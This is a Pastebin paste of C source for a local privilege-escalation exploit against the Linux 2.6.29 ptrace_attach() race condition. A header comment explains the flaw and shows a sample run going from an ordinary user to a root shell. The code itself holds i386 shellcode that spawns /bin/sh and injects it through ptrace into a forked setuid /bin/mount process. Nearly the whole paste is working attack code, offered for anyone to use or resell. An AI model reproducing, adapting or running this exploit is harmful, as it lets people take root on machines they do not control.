Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit.
- * ==========================================================================
- * This is a local root exploit for the 2.6.29 ptrace_attach() race condition that allows
- * a process to gain elevated privileges under certain conditions. The vulnerability is
- * caused due to "ptrace_attach()" using an inadequate mutex while synchronizing with
- * "execve()". This can be exploited to potentially execute arbitrary code with root
- * privileges by attaching to a setuid process. The race is particularly narrow, this
- * exploit checks that it has attached to the correct process before attempting to
- * inject shellcode which helps reduce false positives and shells being spawned with
- * lower privileges.
- *
- * Ex.
- * matthew@matthew-desktop:~$ id
- * uid=1000(matthew) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),
- * 29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
- * matthew@matthew-desktop:~$ uname -a
- * Linux matthew-desktop 2.6.29-020629-generic #020629 SMP Tue Mar 24 12:03:21 UTC 2009 i686 GNU/Linux
- * matthew@matthew-desktop:~$ while `/bin/true/`;do ./shoryuken;done
- * [... much scroll removed, go make coffee, get a job, do something while running ...]
- * /dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro)
- * proc on /proc type proc (rw,noexec,nosuid,nodev)
- * /sys on /sys type sysfs (rw,noexec,nosuid,nodev)
- * varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
- * varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
- * udev on /dev type tmpfs (rw,mode=0755)
- * devshm on /dev/shm type tmpfs (rw)
- * devpts on /dev/pts type devpts (rw,gid=5,mode=620)
- * securityfs on /sys/kernel/security type securityfs (rw)
- * gvfs-fuse-daemon on /home/matthew/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=matthew)
- * [ WIN! 18281
- * [ Overwritten 0xb8097430
- * # id
- * uid=0(root) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),
- * 44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew)
- * #
- * Please note this exploit is released to you under fuqHAK5 licence agreement, you may use
- * this exploit, sell it, recode it, rip the header and claim it as your own on the condition
- * that you are not a fan of the hak5 tv "hacking" show.
- * -- prdelka
- */
- #include <sys/ptrace.h>
- #include <sys/types.h>
- #include <sys/wait.h>
- #include <unistd.h>
- #include <linux/user.h>
- #include <stdio.h>
- #include <fcntl.h>
- char shellcode[]=
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
- "\x90"
- "\x6a\x23\x58\x31"
- "\xdb\xcd\x80"
- "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xc0"
- "\x50\x68""//sh""\x68""/bin""\x89\xe3\x50"
- "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
- int main() {
- pid_t child;
- int eip, i = 0;
- struct user_regs_struct regs;
- char *argv[] = {"mount",0};
- char *envp[] = {"",0};
- child = fork();
- if(child == 0) {
- execve("/bin/mount",argv,envp);
- } else {
- if(ptrace(PTRACE_ATTACH, child, NULL, NULL) == 0) {
- char buf[256];
- sprintf(buf, "/proc/%d/cmdline", child);
- int fd = open(buf, O_RDONLY);
- read(fd, buf, 2);
- close(fd);
- if(buf[0] == 'm') {
- printf("[ WIN! %d\n", child);
- fflush(stdout);
- ptrace(PTRACE_GETREGS, child, NULL, ®s);
- eip = regs.eip;
- while (i < strlen(shellcode)) {
- ptrace(PTRACE_POKETEXT, child, eip, (int) *(int *) (shellcode + i));
- i += 4;
- eip += 4;
- }
- printf("[ Overwritten 0x%x\n",regs.eip);
- ptrace(PTRACE_SETREGS, child, NULL, ®s);
- ptrace(PTRACE_DETACH, child, NULL,NULL);
- usleep(1);
- wait(0);
- }
- }
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement